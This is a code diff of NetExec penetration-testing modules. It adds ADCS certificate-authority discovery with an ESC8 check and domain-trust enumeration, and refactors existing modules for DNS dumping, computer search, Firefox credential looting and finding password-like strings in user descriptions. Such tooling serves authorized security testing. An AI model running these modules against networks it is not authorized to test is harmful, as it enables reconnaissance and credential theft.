+"""
+KNOWN_PROTOCOLS = {
+135: {"bindstr": r"ncacn_ip_tcp:%s[135]"},
+139: {"bindstr": r"ncacn_np:%s[\pipe\epmapper]"},
+443: {"bindstr": r"ncacn_http:[593,RpcProxy=%s:443]"},
+445: {"bindstr": r"ncacn_np:%s[\pipe\epmapper]"},
+593: {"bindstr": r"ncacn_http:%s"}
+}
+
+name = "enum_ca"
+description = "Anonymously uses RPC endpoints to hunt for ADCS CAs"
+supported_protocols = ["smb"] # Example: ['smb', 'mssql']
+opsec_safe = True # Does the module touch disk?
+multiple_hosts = True # Does it make sense to run this module on multiple hosts at a time?
+
+def __init__(self, context=None, module_options=None):
+self.context = context
+self.module_options = module_options
+
+def options(self, context, module_options):
+pass
+
+def on_login(self, context, connection):
+self.__username = connection.username
+self.__password = connection.password
+self.__domain = connection.domain
+self.__lmhash = ""
+self.__nthash = ""
+self.__port = 135.
+self.__stringbinding = ""
+
+if context.hash and ":" in context.hash[0]:
+hashList = context.hash[0].split(":")
+self.__nthash = hashList[-1]
+self.__lmhash = hashList[0]
+elif context.hash and ":" not in context.hash[0]:
+self.__nthash = context.hash[0]
+self.__lmhash = "00000000000000000000000000000000"
+
+self.__stringbinding = self.KNOWN_PROTOCOLS[self.__port]["bindstr"] % connection.host
+context.log.debug(f"StringBinding {self.__stringbinding}")
+
+rpctransport = transport.DCERPCTransportFactory(self.__stringbinding)
+
+if self.__port in [139, 445]:
+# Setting credentials for SMB
+rpctransport.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash)
+rpctransport.setRemoteHost(connection.host)
+rpctransport.set_dport(self.__port)
+elif self.__port in [443]:
+# Setting credentials only for RPC Proxy, but not for the MSRPC level
+rpctransport.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash)
+rpctransport.set_auth_type(AUTH_NTLM)
+else:
+pass
+
+try:
+entries = self.__fetchList(rpctransport)
+except Exception as e:
+error_text = f"Protocol failed: {e}"
+context.log.fail(error_text)
+
+if RPC_PROXY_INVALID_RPC_PORT_ERR in error_text or \
+RPC_PROXY_RPC_OUT_DATA_404_ERR in error_text or \
+RPC_PROXY_CONN_A1_404_ERR in error_text or \
+RPC_PROXY_CONN_A1_0X6BA_ERR in error_text:
+context.log.fail("This usually means the target does not allow "
+"to connect to its epmapper using RpcProxy.")
+return
+for entry in entries:
+tmpUUID = str(entry["tower"]["Floors"][0])
+
+if uuid.uuidtup_to_bin(uuid.string_to_uuidtup(tmpUUID))[:18] in epm.KNOWN_UUIDS:
+exename = epm.KNOWN_UUIDS[uuid.uuidtup_to_bin(uuid.string_to_uuidtup(tmpUUID))[:18]]
+context.log.debug("EXEs %s" % exename)
+if exename == "certsrv.exe":
+context.log.highlight("Active Directory Certificate Services Found.")
+url = f"http://{connection.host}/certsrv/certfnsh.asp"
+context.log.highlight(url)
+try:
+response = requests.get(url, timeout=5)
+if response.status_code == 401 and "WWW-Authenticate" in response.headers and "ntlm" in response.headers["WWW-Authenticate"].lower():
+context.log.highlight("Web enrollment found on HTTP (ESC8).")
+except requests.RequestException as e:
+context.log.debug(e)
+return
+
+def __fetchList(self, rpctransport):
+dce = rpctransport.get_dce_rpc()
+dce.connect()
+resp = epm.hept_lookup(None, dce=dce)
+dce.disconnect()
+return resp
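A hedged sketch of how the KNOWN_PROTOCOLS templates in the new module above become endpoint-mapper string bindings; the host below is a placeholder:

KNOWN_PROTOCOLS = {
    135: {"bindstr": r"ncacn_ip_tcp:%s[135]"},
    443: {"bindstr": r"ncacn_http:[593,RpcProxy=%s:443]"},
}

host = "192.0.2.10"  # placeholder target
for port, proto in KNOWN_PROTOCOLS.items():
    print(port, proto["bindstr"] % host)
# 135 ncacn_ip_tcp:192.0.2.10[135]
# 443 ncacn_http:[593,RpcProxy=192.0.2.10:443]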
@@ -1,6 +1,3 @@
-#!/usr/bin/env python3
-# -*- coding: utf-8 -*-

 from datetime import datetime
 from nxc.helpers.logger import write_log

@@ -23,9 +20,7 @@ class NXCModule:
 self.domains = None

 def options(self, context, module_options):
-"""
+"""DOMAIN Domain to enumerate DNS for. Defaults to all zones."""
-DOMAIN Domain to enumerate DNS for. Defaults to all zones.
-"""
 self.domains = None
 if module_options and "DOMAIN" in module_options:
 self.domains = module_options["DOMAIN"]
@@ -34,15 +29,12 @@ class NXCModule:
 if not self.domains:
 domains = []
 output = connection.wmi("Select Name FROM MicrosoftDNS_Zone", "root\\microsoftdns")
+domains = [result["Name"]["value"] for result in output] if output else []
-if output:
+context.log.success(f"Domains retrieved: {domains}")
-for result in output:
-domains.append(result["Name"]["value"])

-context.log.success("Domains retrieved: {}".format(domains))
 else:
 domains = [self.domains]
 data = ""

 for domain in domains:
 output = connection.wmi(
 f"Select TextRepresentation FROM MicrosoftDNS_ResourceRecord WHERE DomainName = {domain}",
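A hedged sketch of the zone-name extraction added above: connection.wmi() yields a list of property dictionaries (or a falsy value on failure), and the comprehension collapses it to plain zone names. The sample data is made up:

output = [
    {"Name": {"value": "corp.example.local"}},
    {"Name": {"value": "_msdcs.corp.example.local"}},
]
domains = [result["Name"]["value"] for result in output] if output else []
print(domains)  # ['corp.example.local', '_msdcs.corp.example.local']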
@@ -70,6 +62,6 @@ class NXCModule:
 context.log.highlight("\t" + d)
 data += "\t" + d + "\n"

-log_name = "DNS-Enum-{}-{}.log".format(connection.host, datetime.now().strftime("%Y-%m-%d_%H%M%S"))
+log_name = f"DNS-Enum-{connection.host}-{datetime.now().strftime('%Y-%m-%d_%H%M%S')}.log"
 write_log(data, log_name)
 context.log.display(f"Saved raw output to ~/.nxc/logs/{log_name}")

@@ -0,0 +1,86 @@
+from impacket.ldap import ldapasn1 as ldapasn1_impacket
+
+
+class NXCModule:
+"""
+Extract all Trust Relationships, Trusting Direction, and Trust Transitivity
+Module by Brandon Fisher @shad0wcntr0ller
+"""
+
+name = "enum_trusts"
+description = "Extract all Trust Relationships, Trusting Direction, and Trust Transitivity"
+supported_protocols = ["ldap"]
+opsec_safe = True
+multiple_hosts = True
+
+def options(self, context, module_options):
+pass
+
+def on_login(self, context, connection):
+search_filter = "(&(objectClass=trustedDomain))"
+attributes = ["flatName", "trustPartner", "trustDirection", "trustAttributes"]
+
+context.log.debug(f"Search Filter={search_filter}")
+resp = connection.ldapConnection.search(searchFilter=search_filter, attributes=attributes, sizeLimit=0)
+
+trusts = []
+context.log.debug(f"Total of records returned {len(resp)}")
+for item in resp:
+if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
+continue
+flat_name = ""
+trust_partner = ""
+trust_direction = ""
+trust_transitive = []
+try:
+for attribute in item["attributes"]:
+if str(attribute["type"]) == "flatName":
+flat_name = str(attribute["vals"][0])
+elif str(attribute["type"]) == "trustPartner":
+trust_partner = str(attribute["vals"][0])
+elif str(attribute["type"]) == "trustDirection":
+if str(attribute["vals"][0]) == "1":
+trust_direction = "Inbound"
+elif str(attribute["vals"][0]) == "2":
+trust_direction = "Outbound"
+elif str(attribute["vals"][0]) == "3":
+trust_direction = "Bidirectional"
+elif str(attribute["type"]) == "trustAttributes":
+trust_attributes_value = int(attribute["vals"][0])
+if trust_attributes_value & 0x1:
+trust_transitive.append("Non-Transitive")
+if trust_attributes_value & 0x2:
+trust_transitive.append("Uplevel-Only")
+if trust_attributes_value & 0x4:
+trust_transitive.append("Quarantined Domain")
+if trust_attributes_value & 0x8:
+trust_transitive.append("Forest Transitive")
+if trust_attributes_value & 0x10:
+trust_transitive.append("Cross Organization")
+if trust_attributes_value & 0x20:
+trust_transitive.append("Within Forest")
+if trust_attributes_value & 0x40:
+trust_transitive.append("Treat as External")
+if trust_attributes_value & 0x80:
+trust_transitive.append("Uses RC4 Encryption")
+if trust_attributes_value & 0x100:
+trust_transitive.append("Cross Organization No TGT Delegation")
+if trust_attributes_value & 0x2000:
+trust_transitive.append("PAM Trust")
+if not trust_transitive:
+trust_transitive.append("Other")
+trust_transitive = ", ".join(trust_transitive)
+
+if flat_name and trust_partner and trust_direction and trust_transitive:
+trusts.append((flat_name, trust_partner, trust_direction, trust_transitive))
+except Exception as e:
+context.log.debug(f"Cannot process trust relationship due to error {e}")
+
+if trusts:
+context.log.success("Found the following trust relationships:")
+for trust in trusts:
+context.log.highlight(f"{trust[1]} -> {trust[2]} -> {trust[3]}")
+else:
+context.log.display("No trust relationships found")
+
+return True
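The trustAttributes handling in the new module above is a chain of bit tests. A hedged sketch that collapses it into a lookup table; the bit/label pairs mirror the ones listed in the module, and the function name is illustrative:

TRUST_ATTRIBUTE_BITS = {
    0x1: "Non-Transitive",
    0x2: "Uplevel-Only",
    0x4: "Quarantined Domain",
    0x8: "Forest Transitive",
    0x10: "Cross Organization",
    0x20: "Within Forest",
    0x40: "Treat as External",
    0x80: "Uses RC4 Encryption",
    0x100: "Cross Organization No TGT Delegation",
    0x2000: "PAM Trust",
}

def decode_trust_attributes(value):
    labels = [label for bit, label in TRUST_ATTRIBUTE_BITS.items() if value & bit]
    return ", ".join(labels) or "Other"

print(decode_trust_attributes(0x8))   # Forest Transitive
print(decode_trust_attributes(0x44))  # Quarantined Domain, Treat as External
print(decode_trust_attributes(0x0))   # Other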
@ -1,16 +1,14 @@
-#!/usr/bin/env python3
-# -*- coding: utf-8 -*-
-

class NXCModule:
    """
-    Example
+    Example:
+    -------
    Module by @yomama
    """

    name = "example module"
    description = "I do something"
    supported_protocols = []  # Example: ['smb', 'mssql']
    opsec_safe = True  # Does the module touch disk?
    multiple_hosts = True  # Does it make sense to run this module on multiple hosts at a time?

@ -22,7 +20,6 @@ class NXCModule:
        """Required.
        Module options get parsed here. Additionally, put the modules usage here as well
        """
-        pass

    def on_login(self, context, connection):
        """Concurrent.
@ -30,43 +27,39 @@ class NXCModule:
        """
        # Logging best practice
        # Mostly you should use these functions to display information to the user
        context.log.display("I'm doing something")  # Use this for every normal message ([*] I'm doing something)
        context.log.success("I'm doing something")  # Use this for when something succeeds ([+] I'm doing something)
        context.log.fail("I'm doing something")  # Use this for when something fails ([-] I'm doing something), for example a remote registry entry is missing which is needed to proceed
        context.log.highlight("I'm doing something")  # Use this for when something is important and should be highlighted, printing credentials for example

        # These are for debugging purposes
        context.log.info("I'm doing something")  # This will only be displayed if the user has specified the --verbose flag, so add additional info that might be useful
        context.log.debug("I'm doing something")  # This will only be displayed if the user has specified the --debug flag, so add info that you might need for debugging errors

        # These are for more critical error handling
        context.log.error("I'm doing something")  # This will not be printed in the module context and should only be used for critical errors (e.g. a required python file is missing)
        try:
-            raise Exception("Exception that might occure")
+            raise Exception("Exception that might have occurred")
        except Exception as e:
-            context.log.exception(f"Exception occured: {e}")  # This will display an exception traceback screen after an exception was raised and should only be used for critical errors
+            context.log.exception(f"Exception occurred: {e}")  # This will display an exception traceback screen after an exception was raised and should only be used for critical errors

    def on_admin_login(self, context, connection):
        """Concurrent.
        Required if on_login is not present
        This gets called on each authenticated connection with Administrative privileges
        """
-        pass

    def on_request(self, context, request):
        """Optional.
        If the payload needs to retrieve additional files, add this function to the module
        """
-        pass

    def on_response(self, context, response):
        """Optional.
        If the payload sends back its output to our server, add this function to the module to handle its output
        """
-        pass

    def on_shutdown(self, context, connection):
        """Optional.
        Do something on shutdown
        """
-        pass
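As a quick illustration of the hooks and logging helpers documented in the example module above, a minimal hypothetical module sketch follows. The module name, the command it runs, and the connection.execute(command, get_output) call are assumptions for illustration only; the class attributes, the options/on_admin_login hooks and the context.log helpers are the ones shown in the example.

class NXCModule:
    """Minimal sketch of the skeleton documented above (hypothetical, not part of this commit)."""

    name = "whoami-example"  # hypothetical module name
    description = "Runs a single command and highlights its output"
    supported_protocols = ["smb"]
    opsec_safe = True  # does not touch disk
    multiple_hosts = True

    def options(self, context, module_options):
        """No options."""

    def on_admin_login(self, context, connection):
        context.log.display("Running whoami")  # normal progress message
        try:
            output = connection.execute("whoami", True)  # assumes the SMB connection exposes execute(command, get_output)
        except Exception as e:
            context.log.fail(f"Command failed: {e}")  # failure on this host, keep going elsewhere
            return
        context.log.success("Command executed")
        context.log.highlight(output)  # the interesting result, highlighted for the operator

Dropping such a file into the modules directory and invoking it with -M whoami-example would follow the same usage pattern as the other modules in this diff.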
@ -1,85 +1,80 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
# -*- coding: utf-8 -*-
|
|
||||||
import socket
|
import socket
|
||||||
|
from nxc.logger import nxc_logger
|
||||||
|
from impacket.ldap.ldap import LDAPSearchError
|
||||||
|
from impacket.ldap.ldapasn1 import SearchResultEntry
|
||||||
import sys
|
import sys
|
||||||
|
|
||||||
class NXCModule:
|
|
||||||
'''
|
|
||||||
Module by CyberCelt: @Cyb3rC3lt
|
|
||||||
|
|
||||||
Initial module:
|
class NXCModule:
|
||||||
https://github.com/Cyb3rC3lt/CrackMapExec-Modules
|
"""
|
||||||
'''
|
Module by CyberCelt: @Cyb3rC3lt
|
||||||
|
|
||||||
name = 'find-computer'
|
Initial module:
|
||||||
description = 'Finds computers in the domain via the provided text'
|
https://github.com/Cyb3rC3lt/CrackMapExec-Modules
|
||||||
supported_protocols = ['ldap']
|
"""
|
||||||
|
|
||||||
|
name = "find-computer"
|
||||||
|
description = "Finds computers in the domain via the provided text"
|
||||||
|
supported_protocols = ["ldap"]
|
||||||
opsec_safe = True
|
opsec_safe = True
|
||||||
multiple_hosts = False
|
multiple_hosts = False
|
||||||
|
|
||||||
def options(self, context, module_options):
|
def options(self, context, module_options):
|
||||||
'''
|
"""
|
||||||
find-computer: Specify find-computer to call the module
|
find-computer: Specify find-computer to call the module
|
||||||
TEXT: Specify the TEXT option to enter your text to search for
|
TEXT: Specify the TEXT option to enter your text to search for
|
||||||
Usage: nxc ldap $DC-IP -u Username -p Password -M find-computer -o TEXT="server"
|
Usage: nxc ldap $DC-IP -u Username -p Password -M find-computer -o TEXT="server"
|
||||||
nxc ldap $DC-IP -u Username -p Password -M find-computer -o TEXT="SQL"
|
nxc ldap $DC-IP -u Username -p Password -M find-computer -o TEXT="SQL"
|
||||||
'''
|
"""
|
||||||
|
self.TEXT = ""
|
||||||
|
|
||||||
self.TEXT = ''
|
if "TEXT" in module_options:
|
||||||
|
self.TEXT = module_options["TEXT"]
|
||||||
if 'TEXT' in module_options:
|
|
||||||
self.TEXT = module_options['TEXT']
|
|
||||||
else:
|
else:
|
||||||
context.log.error('TEXT option is required!')
|
context.log.error("TEXT option is required!")
|
||||||
exit(1)
|
sys.exit(1)
|
||||||
|
|
||||||
def on_login(self, context, connection):
|
def on_login(self, context, connection):
|
||||||
|
search_filter = f"(&(objectCategory=computer)(&(|(operatingSystem=*{self.TEXT}*))(name=*{self.TEXT}*)))"
|
||||||
# Building the search filter
|
|
||||||
searchFilter = "(&(objectCategory=computer)(&(|(operatingSystem=*"+self.TEXT+"*)(name=*"+self.TEXT+"*))))"
|
|
||||||
|
|
||||||
try:
|
try:
|
||||||
context.log.debug('Search Filter=%s' % searchFilter)
|
context.log.debug(f"Search Filter={search_filter}")
|
||||||
resp = connection.ldapConnection.search(searchFilter=searchFilter,
|
resp = connection.ldapConnection.search(searchFilter=search_filter, attributes=["dNSHostName", "operatingSystem"], sizeLimit=0)
|
||||||
attributes=['dNSHostName','operatingSystem'],
|
except LDAPSearchError as e:
|
||||||
sizeLimit=0)
|
if e.getErrorString().find("sizeLimitExceeded") >= 0:
|
||||||
except ldap_impacket.LDAPSearchError as e:
|
context.log.debug("sizeLimitExceeded exception caught, giving up and processing the data received")
|
||||||
if e.getErrorString().find('sizeLimitExceeded') >= 0:
|
|
||||||
context.log.debug('sizeLimitExceeded exception caught, giving up and processing the data received')
|
|
||||||
resp = e.getAnswers()
|
resp = e.getAnswers()
|
||||||
pass
|
|
||||||
else:
|
else:
|
||||||
logging.debug(e)
|
nxc_logger.debug(e)
|
||||||
return False
|
return False
|
||||||
|
|
||||||
answers = []
|
answers = []
|
||||||
context.log.debug('Total no. of records returned %d' % len(resp))
|
context.log.debug(f"Total no. of records returned: {len(resp)}")
|
||||||
for item in resp:
|
for item in resp:
|
||||||
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
|
if isinstance(item, SearchResultEntry) is not True:
|
||||||
continue
|
continue
|
||||||
dNSHostName = ''
|
dns_host_name = ""
|
||||||
operatingSystem = ''
|
operating_system = ""
|
||||||
try:
|
try:
|
||||||
for attribute in item['attributes']:
|
for attribute in item["attributes"]:
|
||||||
if str(attribute['type']) == 'dNSHostName':
|
if str(attribute["type"]) == "dNSHostName":
|
||||||
dNSHostName = str(attribute['vals'][0])
|
dns_host_name = str(attribute["vals"][0])
|
||||||
elif str(attribute['type']) == 'operatingSystem':
|
elif str(attribute["type"]) == "operatingSystem":
|
||||||
operatingSystem = attribute['vals'][0]
|
operating_system = attribute["vals"][0]
|
||||||
if dNSHostName != '' and operatingSystem != '':
|
if dns_host_name != "" and operating_system != "":
|
||||||
answers.append([dNSHostName,operatingSystem])
|
answers.append([dns_host_name, operating_system])
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
context.log.debug("Exception:", exc_info=True)
|
context.log.debug("Exception:", exc_info=True)
|
||||||
context.log.debug('Skipping item, cannot process due to error %s' % str(e))
|
context.log.debug(f"Skipping item, cannot process due to error {e}")
|
||||||
pass
|
|
||||||
if len(answers) > 0:
|
if len(answers) > 0:
|
||||||
context.log.success('Found the following computers: ')
|
context.log.success("Found the following computers: ")
|
||||||
for answer in answers:
|
for answer in answers:
|
||||||
try:
|
try:
|
||||||
IP = socket.gethostbyname(answer[0])
|
ip = socket.gethostbyname(answer[0])
|
||||||
context.log.highlight(u'{} ({}) ({})'.format(answer[0],answer[1],IP))
|
context.log.highlight(f"{answer[0]} ({answer[1]}) ({ip})")
|
||||||
context.log.debug('IP found')
|
context.log.debug("IP found")
|
||||||
except socket.gaierror as e:
|
except socket.gaierror:
|
||||||
context.log.debug('Missing IP')
|
context.log.debug("Missing IP")
|
||||||
context.log.highlight(u'{} ({}) ({})'.format(answer[0],answer[1],"No IP Found"))
|
context.log.highlight(f"{answer[0]} ({answer[1]}) (No IP Found)")
|
||||||
else:
|
else:
|
||||||
context.log.success('Unable to find any computers with the text "' + self.TEXT + '"')
|
context.log.success(f"Unable to find any computers with the text {self.TEXT}")
|
||||||
|
|
|
@ -1,4 +1,3 @@
-#!/usr/bin/env python3
from dploot.lib.target import Target
from nxc.protocols.smb.firefox import FirefoxTriage

@ -18,7 +17,6 @@ class NXCModule:

    def options(self, context, module_options):
        """Dump credentials from Firefox"""
-        pass

    def on_admin_login(self, context, connection):
        host = connection.hostname + "." + connection.domain
@ -50,8 +48,7 @@ class NXCModule:
            firefox_credentials = firefox_triage.run()
            for credential in firefox_credentials:
                context.log.highlight(
-                    "[%s][FIREFOX] %s %s:%s"
-                    % (
+                    "[{}][FIREFOX] {} {}:{}".format(
                        credential.winuser,
                        credential.url + " -" if credential.url != "" else "-",
                        credential.username,
@ -59,4 +56,4 @@ class NXCModule:
                    )
                )
        except Exception as e:
-            context.log.debug("Error while looting firefox: {}".format(e))
+            context.log.debug(f"Error while looting firefox: {e}")
@ -1,6 +1,3 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
# -*- coding: utf-8 -*-
|
|
||||||
|
|
||||||
from impacket.ldap import ldapasn1 as ldapasn1_impacket
|
from impacket.ldap import ldapasn1 as ldapasn1_impacket
|
||||||
from impacket.ldap import ldap as ldap_impacket
|
from impacket.ldap import ldap as ldap_impacket
|
||||||
import re
|
import re
|
||||||
|
@ -34,7 +31,7 @@ class NXCModule:
|
||||||
self.MINLENGTH = module_options["MINLENGTH"]
|
self.MINLENGTH = module_options["MINLENGTH"]
|
||||||
if "PASSWORDPOLICY" in module_options:
|
if "PASSWORDPOLICY" in module_options:
|
||||||
self.PASSWORDPOLICY = True
|
self.PASSWORDPOLICY = True
|
||||||
self.regex = re.compile("((?=[^ ]*[A-Z])(?=[^ ]*[a-z])(?=[^ ]*\d)|(?=[^ ]*[a-z])(?=[^ ]*\d)(?=[^ ]*[^\w \n])|(?=[^ ]*[A-Z])(?=[^ ]*\d)(?=[^ ]*[^\w \n])|(?=[^ ]*[A-Z])(?=[^ ]*[a-z])(?=[^ ]*[^\w \n]))[^ \n]{" + self.MINLENGTH + ",}") # Credit : https://stackoverflow.com/questions/31191248/regex-password-must-have-at-least-3-of-the-4-of-the-following
|
self.regex = re.compile(r"((?=[^ ]*[A-Z])(?=[^ ]*[a-z])(?=[^ ]*\d)|(?=[^ ]*[a-z])(?=[^ ]*\d)(?=[^ ]*[^\w \n])|(?=[^ ]*[A-Z])(?=[^ ]*\d)(?=[^ ]*[^\w \n])|(?=[^ ]*[A-Z])(?=[^ ]*[a-z])(?=[^ ]*[^\w \n]))[^ \n]{" + self.MINLENGTH + ",}") # Credit : https://stackoverflow.com/questions/31191248/regex-password-must-have-at-least-3-of-the-4-of-the-following
|
||||||
|
|
||||||
def on_login(self, context, connection):
|
def on_login(self, context, connection):
|
||||||
"""Concurrent. Required if on_admin_login is not present. This gets called on each authenticated connection"""
|
"""Concurrent. Required if on_admin_login is not present. This gets called on each authenticated connection"""
|
||||||
|
@ -42,7 +39,7 @@ class NXCModule:
|
||||||
searchFilter = "(objectclass=user)"
|
searchFilter = "(objectclass=user)"
|
||||||
|
|
||||||
try:
|
try:
|
||||||
context.log.debug("Search Filter=%s" % searchFilter)
|
context.log.debug(f"Search Filter={searchFilter}")
|
||||||
resp = connection.ldapConnection.search(
|
resp = connection.ldapConnection.search(
|
||||||
searchFilter=searchFilter,
|
searchFilter=searchFilter,
|
||||||
attributes=["sAMAccountName", "description"],
|
attributes=["sAMAccountName", "description"],
|
||||||
|
@ -54,13 +51,12 @@ class NXCModule:
|
||||||
# We reached the sizeLimit, process the answers we have already and that's it. Until we implement
|
# We reached the sizeLimit, process the answers we have already and that's it. Until we implement
|
||||||
# paged queries
|
# paged queries
|
||||||
resp = e.getAnswers()
|
resp = e.getAnswers()
|
||||||
pass
|
|
||||||
else:
|
else:
|
||||||
nxc_logger.debug(e)
|
nxc_logger.debug(e)
|
||||||
return False
|
return False
|
||||||
|
|
||||||
answers = []
|
answers = []
|
||||||
context.log.debug("Total of records returned %d" % len(resp))
|
context.log.debug(f"Total of records returned {len(resp)}")
|
||||||
for item in resp:
|
for item in resp:
|
||||||
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
|
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
|
||||||
continue
|
continue
|
||||||
|
@ -76,13 +72,12 @@ class NXCModule:
|
||||||
answers.append([sAMAccountName, description])
|
answers.append([sAMAccountName, description])
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
context.log.debug("Exception:", exc_info=True)
|
context.log.debug("Exception:", exc_info=True)
|
||||||
context.log.debug("Skipping item, cannot process due to error %s" % str(e))
|
context.log.debug(f"Skipping item, cannot process due to error {e!s}")
|
||||||
pass
|
|
||||||
answers = self.filter_answer(context, answers)
|
answers = self.filter_answer(context, answers)
|
||||||
if len(answers) > 0:
|
if len(answers) > 0:
|
||||||
context.log.success("Found following users: ")
|
context.log.success("Found following users: ")
|
||||||
for answer in answers:
|
for answer in answers:
|
||||||
context.log.highlight("User: {} description: {}".format(answer[0], answer[1]))
|
context.log.highlight(f"User: {answer[0]} description: {answer[1]}")
|
||||||
|
|
||||||
def filter_answer(self, context, answers):
|
def filter_answer(self, context, answers):
|
||||||
# No option to filter
|
# No option to filter
|
||||||
|
@ -107,10 +102,6 @@ class NXCModule:
|
||||||
if self.regex.search(description):
|
if self.regex.search(description):
|
||||||
conditionPasswordPolicy = True
|
conditionPasswordPolicy = True
|
||||||
|
|
||||||
if self.FILTER and conditionFilter and self.PASSWORDPOLICY and conditionPasswordPolicy:
|
if (conditionFilter == self.FILTER) and (conditionPasswordPolicy == self.PASSWORDPOLICY):
|
||||||
answersFiltered.append([answer[0], description])
|
|
||||||
elif not self.FILTER and self.PASSWORDPOLICY and conditionPasswordPolicy:
|
|
||||||
answersFiltered.append([answer[0], description])
|
|
||||||
elif not self.PASSWORDPOLICY and self.FILTER and conditionFilter:
|
|
||||||
answersFiltered.append([answer[0], description])
|
answersFiltered.append([answer[0], description])
|
||||||
return answersFiltered
|
return answersFiltered
|
||||||
|
|
|
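The PASSWORDPOLICY option in the get_description module above filters descriptions with a "three of four character classes, at least MINLENGTH characters" regex, credited in the source to a Stack Overflow answer. A small standalone sketch makes its behaviour easier to check; MINLENGTH is fixed to "7" here purely for illustration, since the module takes it as a string option and concatenates it into the pattern.

import re

MINLENGTH = "7"  # illustrative value; the module receives this as a string option
regex = re.compile(
    r"((?=[^ ]*[A-Z])(?=[^ ]*[a-z])(?=[^ ]*\d)"
    r"|(?=[^ ]*[a-z])(?=[^ ]*\d)(?=[^ ]*[^\w \n])"
    r"|(?=[^ ]*[A-Z])(?=[^ ]*\d)(?=[^ ]*[^\w \n])"
    r"|(?=[^ ]*[A-Z])(?=[^ ]*[a-z])(?=[^ ]*[^\w \n]))[^ \n]{" + MINLENGTH + ",}"
)

# A description only matches when one space-free run mixes 3 of the 4 classes
for candidate in ["Summer2023!", "password", "Temp pass is P@ssw0rd"]:
    hit = regex.search(candidate)
    print(candidate, "->", hit.group(0) if hit else "no match")

The third example shows why the filter is useful: it pulls the password-looking token ("P@ssw0rd") out of an otherwise harmless-looking description.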
@ -1,17 +1,18 @@
|
||||||
# Credit to https://twitter.com/snovvcrash/status/1550518555438891009
|
# Credit to https://twitter.com/snovvcrash/status/1550518555438891009
|
||||||
# Credit to https://github.com/dirkjanm/adidnsdump @_dirkjan
|
# Credit to https://github.com/dirkjanm/adidnsdump @_dirkjan
|
||||||
# module by @mpgn_x64
|
# module by @mpgn_x64
|
||||||
|
import re
|
||||||
from os.path import expanduser
|
from os.path import expanduser
|
||||||
import codecs
|
import codecs
|
||||||
import socket
|
import socket
|
||||||
from builtins import str
|
|
||||||
from datetime import datetime
|
from datetime import datetime
|
||||||
from struct import unpack
|
from struct import unpack
|
||||||
|
|
||||||
import dns.name
|
import dns.name
|
||||||
import dns.resolver
|
import dns.resolver
|
||||||
|
from impacket.ldap import ldap
|
||||||
from impacket.structure import Structure
|
from impacket.structure import Structure
|
||||||
|
from impacket.ldap import ldapasn1 as ldapasn1_impacket
|
||||||
from ldap3 import LEVEL
|
from ldap3 import LEVEL
|
||||||
|
|
||||||
|
|
||||||
|
@ -37,13 +38,13 @@ def get_dns_resolver(server, context):
|
||||||
server = server[8:]
|
server = server[8:]
|
||||||
socket.inet_aton(server)
|
socket.inet_aton(server)
|
||||||
dnsresolver.nameservers = [server]
|
dnsresolver.nameservers = [server]
|
||||||
except socket.error:
|
except OSError:
|
||||||
context.info("Using System DNS to resolve unknown entries. Make sure resolving your" " target domain works here or specify an IP as target host to use that" " server for queries")
|
context.info("Using System DNS to resolve unknown entries. Make sure resolving your target domain works here or specify an IP as target host to use that server for queries")
|
||||||
return dnsresolver
|
return dnsresolver
|
||||||
|
|
||||||
|
|
||||||
def ldap2domain(ldap):
|
def ldap2domain(ldap):
|
||||||
return re.sub(",DC=", ".", ldap[ldap.lower().find("dc=") :], flags=re.I)[3:]
|
return re.sub(",DC=", ".", ldap[ldap.lower().find("dc="):], flags=re.I)[3:]
|
||||||
|
|
||||||
|
|
||||||
def new_record(rtype, serial):
|
def new_record(rtype, serial):
|
||||||
|
@ -51,7 +52,7 @@ def new_record(rtype, serial):
|
||||||
nr["Type"] = rtype
|
nr["Type"] = rtype
|
||||||
nr["Serial"] = serial
|
nr["Serial"] = serial
|
||||||
nr["TtlSeconds"] = 180
|
nr["TtlSeconds"] = 180
|
||||||
# From authoritive zone
|
# From authoritative zone
|
||||||
nr["Rank"] = 240
|
nr["Rank"] = 240
|
||||||
return nr
|
return nr
|
||||||
|
|
||||||
|
@ -82,17 +83,16 @@ def searchResEntry_to_dict(results):
|
||||||
|
|
||||||
class NXCModule:
|
class NXCModule:
|
||||||
name = "get-network"
|
name = "get-network"
|
||||||
description = ""
|
description = "Query all DNS records with the corresponding IP from the domain."
|
||||||
supported_protocols = ["ldap"]
|
supported_protocols = ["ldap"]
|
||||||
opsec_safe = True
|
opsec_safe = True
|
||||||
multiple_hosts = True
|
multiple_hosts = True
|
||||||
|
|
||||||
def options(self, context, module_options):
|
def options(self, context, module_options):
|
||||||
"""
|
"""
|
||||||
ALL Get DNS and IP (default: false)
|
ALL Get DNS and IP (default: false)
|
||||||
ONLY_HOSTS Get DNS only (no ip) (default: false)
|
ONLY_HOSTS Get DNS only (no ip) (default: false)
|
||||||
"""
|
"""
|
||||||
|
|
||||||
self.showall = False
|
self.showall = False
|
||||||
self.showhosts = False
|
self.showhosts = False
|
||||||
self.showip = True
|
self.showip = True
|
||||||
|
@ -115,29 +115,27 @@ class NXCModule:
|
||||||
|
|
||||||
def on_login(self, context, connection):
|
def on_login(self, context, connection):
|
||||||
zone = ldap2domain(connection.baseDN)
|
zone = ldap2domain(connection.baseDN)
|
||||||
dnsroot = "CN=MicrosoftDNS,DC=DomainDnsZones,%s" % connection.baseDN
|
dns_root = f"CN=MicrosoftDNS,DC=DomainDnsZones,{connection.baseDN}"
|
||||||
searchtarget = "DC=%s,%s" % (zone, dnsroot)
|
search_target = f"DC={zone},{dns_root}"
|
||||||
context.log.display("Querying zone for records")
|
context.log.display("Querying zone for records")
|
||||||
sfilter = "(DC=*)"
|
sfilter = "(DC=*)"
|
||||||
|
|
||||||
try:
|
try:
|
||||||
list_sites = connection.ldapConnection.search(
|
list_sites = connection.ldapConnection.search(
|
||||||
searchBase=searchtarget,
|
searchBase=search_target,
|
||||||
searchFilter=sfilter,
|
searchFilter=sfilter,
|
||||||
attributes=["dnsRecord", "dNSTombstoned", "name"],
|
attributes=["dnsRecord", "dNSTombstoned", "name"],
|
||||||
sizeLimit=100000,
